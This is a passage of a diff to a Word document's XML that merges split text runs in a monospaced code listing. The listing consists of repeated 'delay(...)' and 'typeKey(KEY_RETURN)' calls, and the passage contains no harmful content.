-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>400);</w:t>
+                        <w:t xml:space="preserve">  delay(400);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22002,25 +21208,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22054,25 +21242,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22089,25 +21259,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22141,25 +21293,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22176,25 +21310,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22211,25 +21327,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22263,25 +21361,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22298,25 +21378,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22350,25 +21412,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22385,25 +21429,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22437,25 +21463,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22472,25 +21480,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22524,25 +21514,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22559,25 +21531,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22611,25 +21565,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22646,25 +21582,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22698,25 +21616,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22733,25 +21633,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22785,25 +21667,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22820,25 +21684,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22872,25 +21718,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22907,25 +21735,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22959,25 +21769,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -22994,25 +21786,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23046,25 +21820,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23081,25 +21837,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23133,25 +21871,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23168,25 +21888,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23220,25 +21922,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23255,25 +21939,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23307,25 +21973,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -23368,25 +22016,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
